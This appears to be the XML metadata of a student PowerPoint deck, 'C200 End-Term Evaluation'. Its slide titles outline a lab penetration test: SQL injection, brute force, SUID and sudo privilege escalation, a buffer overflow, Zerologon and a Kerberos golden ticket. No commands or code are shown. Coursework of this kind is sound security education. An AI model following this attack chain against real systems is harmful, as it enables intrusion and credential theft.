          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747575" y="3428989"/>
            <a:ext cx="7477200" cy="47153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4232</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>711</Paragraphs>
  <Slides>117</Slides>
  <Notes>117</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117</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="121" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>3_Office Theme</vt:lpstr>
      <vt:lpstr>C200 End-Term Evaluation </vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Project Specification</vt:lpstr>
      <vt:lpstr>Project Specification</vt:lpstr>
      <vt:lpstr>System Design</vt:lpstr>
      <vt:lpstr>System Design</vt:lpstr>
      <vt:lpstr>Task Allocation and Progress</vt:lpstr>
      <vt:lpstr>Task Allocation and Progress</vt:lpstr>
      <vt:lpstr>Task Allocation and Progress</vt:lpstr>
      <vt:lpstr>Task Allocation and Progress</vt:lpstr>
      <vt:lpstr>Records of Team Meetings with Supervisor</vt:lpstr>
      <vt:lpstr>Prototype Walk Through / Demonstration </vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection (Mitigation)</vt:lpstr>
      <vt:lpstr>Mitigation from the Website (File Upload)</vt:lpstr>
      <vt:lpstr>Mitigation from the Website (Forum_XSS)</vt:lpstr>
      <vt:lpstr>Proof of Concept (Mitigation testing)</vt:lpstr>
      <vt:lpstr>Moving of tools to Web Server </vt:lpstr>
      <vt:lpstr>Pivoting</vt:lpstr>
      <vt:lpstr>Pivoting - Proxy</vt:lpstr>
      <vt:lpstr>Nmap using proxy </vt:lpstr>
      <vt:lpstr>Brute force telnet </vt:lpstr>
      <vt:lpstr>Brute force telnet using hydra</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Login to dave using telnet</vt:lpstr>
      <vt:lpstr>Send over linux enumeration scripts </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Interesting findings </vt:lpstr>
      <vt:lpstr>Misconfigured SUID file</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>backdoor with cp</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Sudo </vt:lpstr>
      <vt:lpstr>Cracking sudo </vt:lpstr>
      <vt:lpstr>Cracking sudo</vt:lpstr>
      <vt:lpstr>Cracking sudo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Exploit part 1 </vt:lpstr>
      <vt:lpstr>Exploit part 2 </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>End of Mail server </vt:lpstr>
      <vt:lpstr>Accessing the Windows Computer</vt:lpstr>
      <vt:lpstr>Accessing the Windows Computer</vt:lpstr>
      <vt:lpstr>Accessing the Windows Computer</vt:lpstr>
      <vt:lpstr>Accessing the Windows Computer</vt:lpstr>
      <vt:lpstr>End-Term Assessement Start here</vt:lpstr>
      <vt:lpstr>After getting access to the admin account</vt:lpstr>
      <vt:lpstr>Exploiting of the Web Server</vt:lpstr>
      <vt:lpstr>Using XXS to execute the payload</vt:lpstr>
      <vt:lpstr>Setting up Multi/handler</vt:lpstr>
      <vt:lpstr>Privilege escalation</vt:lpstr>
      <vt:lpstr>Find the exploit in exploit DB</vt:lpstr>
      <vt:lpstr>Upload the payload into the Ubuntu</vt:lpstr>
      <vt:lpstr>Activate the payload</vt:lpstr>
      <vt:lpstr>Check if it happens</vt:lpstr>
      <vt:lpstr>Buffer overflow (Fuzzing)</vt:lpstr>
      <vt:lpstr>Buffer overflow (Fuzzing)</vt:lpstr>
      <vt:lpstr>Buffer overflow (Finding the offset)</vt:lpstr>
      <vt:lpstr>Buffer overflow (Finding the offset)</vt:lpstr>
      <vt:lpstr>Buffer overflow (Overwrite the EIP)</vt:lpstr>
      <vt:lpstr>Buffer overflow (Finding bad characters)</vt:lpstr>
      <vt:lpstr>Buffer overflow (Finding bad characters)</vt:lpstr>
      <vt:lpstr>Buffer overflow (Finding bad characters) </vt:lpstr>
      <vt:lpstr>Buffer overflow (Finding the JMP ESP address) </vt:lpstr>
      <vt:lpstr>Buffer overflow (Finding the JMP ESP address)</vt:lpstr>
      <vt:lpstr>Buffer overflow (Crafting our payload)</vt:lpstr>
      <vt:lpstr>Buffer overflow (Crafting our payload)</vt:lpstr>
      <vt:lpstr>Buffer overflow (Crafting our payload)</vt:lpstr>
      <vt:lpstr>Buffer overflow (Gaining shell)</vt:lpstr>
      <vt:lpstr>Buffer overflow (Gaining shell)</vt:lpstr>
      <vt:lpstr>Buffer overflow (attack from public network)</vt:lpstr>
      <vt:lpstr>Buffer overflow (attack from public network) </vt:lpstr>
      <vt:lpstr>Buffer overflow (attack from public network) </vt:lpstr>
      <vt:lpstr>Buffer overflow (attack from public network) </vt:lpstr>
      <vt:lpstr>Buffer overflow (attack from public network) </vt:lpstr>
      <vt:lpstr>Buffer overflow (attack from public network)</vt:lpstr>
      <vt:lpstr>Buffer overflow (attack from public network)</vt:lpstr>
      <vt:lpstr>Buffer overflow (attack from public network) </vt:lpstr>
      <vt:lpstr>Buffer overflow (attack from public network) </vt:lpstr>
      <vt:lpstr>Buffer overflow (attack from public network)</vt:lpstr>
      <vt:lpstr>Buffer overflow (attack from public network)</vt:lpstr>
      <vt:lpstr>Buffer overflow (attack from public network)</vt:lpstr>
      <vt:lpstr>Buffer overflow (attack from public network) </vt:lpstr>
      <vt:lpstr>AD Exploit Zerologon</vt:lpstr>
      <vt:lpstr>Story 2</vt:lpstr>
      <vt:lpstr>AD Exploit Zerologon</vt:lpstr>
      <vt:lpstr>AD Exploit Zerologon</vt:lpstr>
      <vt:lpstr>AD Exploit Zerologon</vt:lpstr>
      <vt:lpstr>Cracking the hashes</vt:lpstr>
      <vt:lpstr>Cracking the hashes</vt:lpstr>
      <vt:lpstr>Kerberos Golden Ticket</vt:lpstr>
      <vt:lpstr>Dump the kerberos NTLM hash and getting its SID</vt:lpstr>
      <vt:lpstr>After dumping we use the SID and NTLM to access the kerberos share folder</vt:lpstr>
      <vt:lpstr>Pass the ticket</vt:lpstr>
      <vt:lpstr>Entering the shared folder in the C4G server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C200 End-Term Evaluation </dc:title>
  <dc:creator>deborah_zhou</dc:creator>
  <cp:lastModifiedBy>Muhd Wafi</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-04-11T03:57:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-23T11:49:37Z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0x0101007C31C6AD88AF56458E1B6999E050E146</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="_dlc_DocIdItemGuid">
    <vt:lpwstr>a7af4c30-bc15-46d4-b549-d41daf953211</vt:lpwstr>
  </property>
</Properties>
</file>